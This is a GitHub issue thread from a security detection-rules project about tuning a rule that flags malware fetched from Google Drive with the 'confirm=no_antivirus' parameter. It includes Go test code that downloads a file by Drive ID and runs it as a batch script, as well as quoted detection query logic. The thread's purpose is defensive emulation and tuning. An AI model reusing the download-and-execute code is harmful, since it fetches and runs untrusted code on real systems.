Skip to content

[Rule Tuning] Google Drive Direct Download Detection #3391

Closed
@terrancedejesus

Description

@terrancedejesus
Contributor

Link to rule

https://github.com/elastic/detection-rules/blob/main/rules/cross-platform/command_and_control_google_drive_malicious_file_download.toml

Description

This rule has some performance and false-positive considerations that should be addressed. The maxspan is small, however the use of wildcards and OR logic may be too broad and cause performance issues when the first sequence query is collecting events.

### Tasks
- [ ] https://github.com/elastic/detection-rules/pull/3411
- [ ] Create a new rule, primarily identifying HTTP requests (so we can have logic on the URI parameters) to that URL
- [ ] Start some digging into new terms for process executable and dns domain combinations to web services and chat platforms (telegram, discord, etc.)

Activity

terrancedejesus

terrancedejesus commented on Jan 23, 2024

@terrancedejesus
ContributorAuthor

Update 01-23-2024

After some initial triage, it appears that direct download links to Google Drive with parameter confirm=no_antivirus may no longer be viable. Although this is submitted, response code 303 is given and redirection to a manual download page is given. Before, it would download the malware directly without the redirection.

While this is the case, the threat of leveraging Google Drive for malware distribution is still prevalent, however, further research and emulation will need to be conducted to properly tune this rule.

Regarding performance, the rule can also be adjusted - specifically with the initial sequence and wildcard usage. Since we have no visibility into the URL requested during the TLS connection, we are unable to write logic on URL parameters. As a result, we must rely on a collection of events with DNS traffic, process and file based events.

Go code to download directly from Google Drive and execute batch script- used for testing:
    "io"
    "net/http"
    "os"
    "os/exec"
)

func main() {
    // Define a command-line flag
    fileID := flag.String("id", "", "Google Drive file ID")
    flag.Parse()

    // Check if the file ID is provided
    if *fileID == "" {
        fmt.Println("Please provide a Google Drive file ID using -id flag.")
        os.Exit(1)
    }

    filename := "downloaded_script.bat"
    fileURL := fmt.Sprintf("https://drive.google.com/uc?export=download&id=%s&confirm=no_antivirus", *fileID)
    err := downloadFile(filename, fileURL)
    if err != nil {
        panic(err)
    }
    fmt.Println("File downloaded successfully")

    // Execute the file
    err = executeBatchFile(filename)
    if err != nil {
        panic(err)
    }
    fmt.Println("Batch file executed successfully")
}

// downloadFile will download a url to a local file.
func downloadFile(filepath string, url string) error {
    // Get the data
    resp, err := http.Get(url)
    if err != nil {
        return err
    }
    defer resp.Body.Close()

    // Create the file
    out, err := os.Create(filepath)
    if err != nil {
        return err
    }
    defer out.Close()

    // Write the body to file
    _, err = io.Copy(out, resp.Body)
    return err
}

// executeBatchFile executes a .bat file.
func executeBatchFile(filepath string) error {
    cmd := exec.Command("cmd", "/C", filepath)
    cmd.Stdout = os.Stdout
    cmd.Stderr = os.Stderr
    return cmd.Run()
}
rheimsothdecoit

rheimsothdecoit commented on Jan 25, 2024

@rheimsothdecoit

Be aware that this OR after the first block makes nearly always the following parts useless, e.g. in our environment event.action is always "load".

Please check if instead of the "or" "and" would be correct.

/* Look for processes started or libraries loaded from untrusted or unsigned Windows, Linux or macOS binaries */
(event.action in ("exec", "fork", "start", "load")) or

/* Look for Google Drive download URL with AV flag skipping */
(process.args : "*drive.google.com*" and process.args : "*export=download*" and process.args : "*confirm=no_antivirus*")

...

Also the benign process list does not contain firefox and chrome binaries on linux machines, only the windows parts.

...
 and not process.executable:
        ("/bin/terraform",
        "*/bin/dockerd",
        "/usr/local/bin/docker-init",
        "*/bin/go",
        "?:\\Program Files*\\Mozilla Firefox\firefox.exe",
        "?:\\Program Files*\\Google\\Chrome\\Application\\chrome.exe")
...
terrancedejesus

terrancedejesus commented on Feb 1, 2024

@terrancedejesus
ContributorAuthor

Update 02-01-2024

After some research and discussion, we have expanded the scope of this rule tuning issue. We will be decoupling some of the activity attempted to be identified with the original rule, as well as creating new rules to detect similar activity.

Details can be found in the tuning pull request: #3411 (comment)

A tasklist has been added at the top of this tuning to add additional scope.

changed the title [-][Rule Tuning] Malicious File Downloaded from Google Drive[/-] [+][Rule Tuning] Google Drive Direct Download Detection[/+] on Feb 1, 2024
botelastic

botelastic commented on Apr 1, 2024

@botelastic

This issue has been automatically marked as stale because it has not had recent activity. It will be closed if no further activity occurs. Thank you for your contributions.

3 remaining items

Loading
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Metadata

Metadata

Type

No type

Projects

No projects

Milestone

No milestone

Relationships

None yet

    Development

    No branches or pull requests

      Participants

      @w0rk3r@terrancedejesus@rheimsothdecoit

      Issue actions

        [Rule Tuning] Google Drive Direct Download Detection · Issue #3391 · elastic/detection-rules